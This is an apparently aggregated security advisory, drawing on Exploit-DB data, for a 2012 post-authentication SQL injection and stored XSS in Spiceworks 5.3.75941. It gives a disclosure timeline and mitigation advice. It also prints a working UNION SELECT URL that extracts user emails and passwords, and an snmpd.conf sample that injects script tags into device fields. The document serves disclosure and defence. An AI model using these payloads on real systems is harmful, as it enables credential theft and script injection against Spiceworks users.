SQL Injection (Post-Authentication) and Stored XSS in SpiceWorks

vendor:

Spiceworks

by:

CERT

8,8

CVSS

HIGH

SQL Injection and Stored XSS

89 (SQL Injection) and 79 (XSS)

CWE

Product Name: Spiceworks

Affected Version From: 5.3.75941

Affected Version To: 5.3.75941

Patch Exists: NO

Related CWE: N/A

CPE: a:spiceworks:spiceworks

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

SQL Injection (Post-Authentication) and Stored XSS in SpiceWorks

An attacker can exploit a SQL injection vulnerability in SpiceWorks to gain access to sensitive information. The vulnerability exists in the API_v2.json endpoint, which allows an attacker to inject malicious SQL code into the query parameters. An attacker can also exploit a stored XSS vulnerability in SpiceWorks by configuring their snmpd.conf file to contain malicious JavaScript.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in a SQL query. Additionally, ensure that all user-supplied input is properly sanitized and validated before being used in a web application.

Source

Exploit-DB raw data:

Product: SpiceWorks
Version: 5.3.75941
Vendor Site: http://www.spiceworks.com/community/
Software Download Link: http://www.spiceworks.com/download/?utm_source=comm-secondary-link&utm_medium=website&utm_campaign=homepage
Installer Filename: Spiceworks.exe  MD5: 023bd361c0f9402dc07adbc5a72fe31d
Contact: http://www.spiceworks.com/contact/

Timeline:

04 Jun 2012: Vulnerability reported to CERT
08 Jun 2012: Response received from CERT with disclosure date of 20 Jul 2012
23 Jul 2012: Updated received from CERT: No response from vendor
23 Jul 2012: Public Disclosure

SQL Injection (Post-Authentication):

http://server/api_v2.json?queries[device][class]=Device&queries[device][select]=id,b_manufacturer,manufacturer,b_model,model,operating_system,device_type&queries[device][conditions]=id=14%29%20UNION%20SELECT%20NULL,%20NULL,%20NULL,%20email,%20NULL,%20NULL,%20password%20from%20users%20where%20id=1--

Stored XSS:

An attacker can configure their snmpd.conf file to contain malicious JavaScript as shown in the proof of concept below:

rocommunity public
com2sec local	localhost	public
view	systemview	included	.1.3.6.1.2.1.1
view    systemview      included	.1.3.6.1.2.1.25.1.1
view    systemview      included	.1 80
syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName dook<script>alert('name')</script>